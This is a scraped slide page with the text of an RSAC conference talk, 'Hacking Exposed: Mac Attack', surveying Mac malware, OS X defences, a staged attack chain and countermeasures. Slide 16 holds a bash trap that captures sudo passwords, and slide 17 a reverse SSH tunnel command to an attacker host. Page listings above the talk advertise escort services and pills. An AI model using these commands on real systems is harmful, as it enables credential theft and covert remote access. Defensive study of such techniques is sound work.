AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 

Hacking Exposed: The Mac Attack

  • 1. SESSION ID: #RSAC Dmitri Alperovitch HACKING EXPOSED: MAC ATTACK EXP-R04 Co-Founder & CTO CrowdStrike Inc. @DAlperovitch George Kurtz Co-Founder, President & CEO CrowdStrike Inc. @George_Kurtz
  • 2. #RSAC GEORGE KURTZ In security for 20 +years President & CEO, CrowdStrike Former CTO, McAfee Former CEO, Foundstone Co-Author, Hacking Exposed 2 A LITTLE ABOUT US:
  • 3. #RSAC DMITRI ALPEROVITCH Co-Founder & CTO, CrowdStrike Former VP Threat Research, McAfee Author of Operation Aurora, Night Dragon, Shady RAT reports MIT Tech Review’s Top 35 Innovator Under 35 for 2013 Foreign Policy’s Top 100 Leading Global Thinkers for 2013 3 A LITTLE ABOUT US:
  • 4. #RSAC The Ninjas Matt Bauer Sr. Software Engineer CrowdStrikeJaron Bradley Sr. Intrusion Analyst CrowdStrike
  • 5. #RSAC Agenda 5 Mac Attacks OSX Security Features Tradecraft The Setup & Attack Plan Demo Countermeasures
  • 6. #RSAC Mac market share rising 6 StatCounter 89.9 90.55 88.83 86.8 84.83 7.47 7.66 8.72 9.33 9.14 0 10 20 30 40 50 60 70 80 90 100 2012 2013 2014 2015 2016 Desktop/Laptop Market Share 2012-2016 Windows Mac
  • 7. #RSAC Mac Attacks 7 Winter 2006: Leap Worm Spreads as an archive sent over iChat to local users Limited harmful impact Fall 2007: RSPlug DNSChanger variant for Mac Distributed as fake video codec on porn sites Changed DNS servers to redirect to phishing and porn sites Fall 2010: Koobface Mac version of infamous Facebook worm
  • 8. #RSAC Mac Attacks (cont) 8 Fall 2011: Flashback Worm > 700,000 infected users Infection via Drive-By Java exploit Winter 2012: Gh0st RAT OSX Variant (MacControl) KEYHOLE PANDA targeted malware targeting Tibetan and Uyghur activists Delivered via Java and Office exploits Summer 2012: OSX/Crisis (Attribution: Hacking Team) Discovered in targeted intrusions Monitors and records Skype, Adium, web browsing Rootkit capabilities
  • 9. #RSAC Mac Attacks (cont) 9 Fall 2013: OSX/Leverage Discovered in targeted intrusions related to Syria Written in RealBasic Winter 2016: FakeFlash Signed fake Flash player update Installs scareware (FakeAV style)
  • 11. #RSAC OSX Security Features 11 Leopard: 2007 Quarantine Bit: extended file attribute flag indicating the file was downloaded from the Web Partial ASLR App Sandbox (Seatbelt) Snow Leopard: 2009 XProtect: AV-style blacklist updated monthly by Apple Lion: 2011 FileVault: full-disk encryption NX, Full ASLR
  • 12. #RSAC OSX Security Features (cont) 12 Mountain Lion: 2012 Gatekeeper Kernel ASLR Mavericks: 2013 Support code-signing for kernel extensions El Capitan: 2015 Full requirement to code-sign kernel extensions System Integrity Protection: prevent root user from tampering with key system files and raise the bar for rootkits and prevent code injection App Transport Security (ATS): HTTPS with forward secrecy by default in apps
  • 14. #RSAC Challenges to solve 14 Initial infiltration: Code Execution How to get around Gatekeeper? Possibilities 1. Exploit browser (eg. Java, Flash, native browser exploit) 2. Exploit productivity app (eg. Office, Preview, Adium) 3. Spearphish user with link/attachment (with Gatekeeper hack)
  • 15. #RSAC Bypassing Gatekeeper 15 Great research by Patrick Wardle @ Synack (VB2015 paper)
  • 16. #RSAC Challenges to solve (cont) 16 Privilege Escalation How to become root? Possibilities 1. Privesc exploit 2. Hook sudo in bash getpwd () { if [[ $BASH_COMMAND == sudo* ]]; then printf “Password:” read –s PASS; echo $PASS >/tmp/com.apple.launchd.pshbnY173 echo –e “nSorry, try again.n” fi } trap getpwd DEBUG 3. Ask the user during install
  • 17. #RSAC Challenges to solve (cont) 17 Persistence and Command & Control How to gain & keep remote access? Possibilities 1. Malware 2. Reverse ssh tunnel ssh –fN –R ${PortFwd}:localhost:22 acc@attackbox a. Save in plist file b. Convert to binary with plutil –convert binary1 ${ASEPplist} c. Save in /System/Library/LaunchDaemons (use SIP exception file)
  • 18. #RSAC Challenges to solve (cont) 18 Stealth How to keep hidden from easy discovery? Possibilities 1. Malware rootkit hooks 2. Bash hooks in /etc/profile “ps aux” before hook “ps aux” after hook
  • 19. #RSAC Challenges to solve (cont) 19 Permanent backdoor How do we quietly backdoor many other systems/applications? Ken Thompson: “Reflections on Trusting Trust” (1984) Lesson: Backdooring the compiler is the ultimate win Idea: Let’s hijack XCode compilation process
  • 20. #RSAC XCode hijacking 20 Yet again - great research by Patrick Wardle (CanSecWest 2015) Dylib hijacking (similar to DLL hijacking on Windows) 1. Place a malicious dylib in the search ppath of XCode application 2. Intercept compilation requests and inject backdoor source code, removing any information from the build log 3. PROFIT!
  • 21. #RSAC Putting it all together: Setup & Attack Plan
  • 22. #RSAC Attack Overview 22 1. Send spearphish “Software Update” package to victim 2. Package it up with signed binary vulnerable to Gatekeeper bypass 3. Steal root password via UI prompt and sudo hook (failsafe) 4. Establish persistent SSH reverse tunnel via ASEP plist 5. Hook /etc/profile to hide our SSH tunnel, files and root activities 6. Steal victim keychain through SSH tunnel 7. Use stolen keychain to move laterally to Windows systems and exfiltrate data (smbutil) 8. Implant Xcode malicious Dylib to backdoor compiled applications 9. WIN!
  • 23. #RSAC Network Setup 23 Windows File Share Victim Mac System Attacker Macbook (for keychain extraction) Attacker C2
  • 25. #RSAC Countermeasures 25 Keep close eye on /etc/profile, /etc/.bashrc, ~/.bash_profile, ~/.bashrc, ~/.bash_logout and ~/.inputrc Monitor for suspicious network connections out of your environment Monitor for any suspicious DYLIB writes to key /Applications and /System directories Use next-generation Endpoint Detect & Response (EDR) solutions
  • 26. #RSAC THANK YOU! 26 HOW TO REACH US: TWITTER: @GEORGE_KURTZ & @DALPEROVITCH LEARN MORE ABOUT NEXT-GENERATION ENDPOINT PROTECTION LEARN ABOUT CROWDSTRIKE FALCON: WWW.CROWDSTRIKE.COM/PRODUCTS REQUEST A DEMO: WWW.CROWDSTRIKE.COM/REQUEST-A-DEMO/ COME MEET US: BOOTH 2045 SOUTH HALL